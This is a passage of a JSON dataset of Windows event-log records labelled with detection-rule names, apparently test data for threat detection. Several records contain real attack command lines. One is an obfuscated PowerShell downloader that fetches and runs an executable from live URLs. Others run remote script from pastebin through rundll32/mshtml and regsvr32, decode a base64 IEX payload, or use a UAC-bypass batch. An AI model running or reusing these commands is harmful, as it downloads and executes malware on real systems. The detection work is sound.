AUTHORITY\\SYSTEM","UtcTime":"2020-08-02 16:24:28.637"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":339891,"Execution_attributes":{"ProcessID":3200,"ThreadID":3032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:28.640990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-90AF-610F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-182D-610F-0000-00100344D300","ProcessId":11196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-08-07 23:33:01.121"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":556726,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:01.176666Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c start /min C:\\Users\\Public\\KDECO.bat reg delete hkcu\\Environment /v windir /f && REM \\system32\\AppHostRegistrationVerifier.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1231-610F-0000-002057A80700","LogonId":"0x7a857","OriginalFileName":"Cmd.Exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1108,"ProcessGuid":"747F3D96-183B-610F-0000-0010DC6CD400","ProcessId":11324,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-08-07 23:33:15.285"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":557006,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:15.303423Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"fdd51159-9602-40cb-839d-c31039ebbc3a","ScriptBlockText":"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\\WOrd\\2019\\ -itemtype DIrectOry;[Net.ServicePointManager]::\"SecURi`T`ypRO`T`oCOL\" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').\"S`Plit\"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.\"d`OWN`load`FIlE\"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).\"le`NgTH\" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"DESKTOP-RIPCLIP","Correlation_attributes":{"ActivityID":"CCAD9034-7B61-0001-83CF-ADCC617BD601"},"EventID":4104,"EventRecordID":683,"Execution_attributes":{"ProcessID":6620,"ThreadID":6340},"Keywords":"0x0","Level":5,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-2895499743-3664716236-3399808827-1001"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-08-26T05:09:28.845521Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":565591,"Execution_attributes":{"ProcessID":780,"ThreadID":2472},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T23:23:37.147709Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32853,"Execution_attributes":{"ProcessID":736,"ThreadID":1592},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:00:50.800225Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32950,"Execution_attributes":{"ProcessID":736,"ThreadID":2372},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:29:57.863893Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["HH.exe Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft® HTML Help Executable","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C","Image":"C:\\Windows\\hh.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-ABD7-5D3A-0000-001012661000","ParentProcessId":4940,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ProcessId":1504,"Product":"HTML Help","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.345"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4348,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.375565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32","HTML Help Shell Spawn","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c copy /Y C:\\Windows\\system32\\rundll32.exe %%TEMP%%\\out.exe > nul && %%TEMP%%\\out.exe javascript:\"\\..\\mshtml RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://pastebin.com/raw/y2CjnRtH\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im out.exe\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","ParentImage":"C:\\Windows\\hh.exe","ParentProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ParentProcessId":1504,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001004D84E00","ProcessId":5548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4353,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.935857Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" zipfldr.dll,RouteTheCall c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 14 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-268F-5CD8-0000-0010F4A51700","ParentProcessId":1256,"ProcessGuid":"365ABB72-269E-5CD8-0000-001084F81A00","ProcessId":2728,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:58:54.772"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16443,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:58:54.897009Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Calculator","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe","ParentImage":"C:\\Windows\\System32\\pcalua.exe","ParentProcessGuid":"365ABB72-517E-5CD8-0000-001024D61700","ParentProcessId":2952,"ProcessGuid":"365ABB72-517E-5CD8-0000-00105FE01700","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:01:50.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16498,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:01:51.007950Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-6693-5CD8-0000-0010AE4C0E00","ParentProcessId":3528,"ProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ProcessId":1420,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 18:35:05.140"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16792,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.155949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ParentProcessId":1420,"ProcessGuid":"365ABB72-6759-5CD8-0000-001085031000","ProcessId":1912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 18:35:05.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16793,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.780949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F41E-5D53-0000-001067C80300","ParentProcessId":4824,"ProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10674,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.614739Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ParentProcessId":2476,"ProcessGuid":"747F3D96-FBCA-5D53-0000-001036784100","ProcessId":2876,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 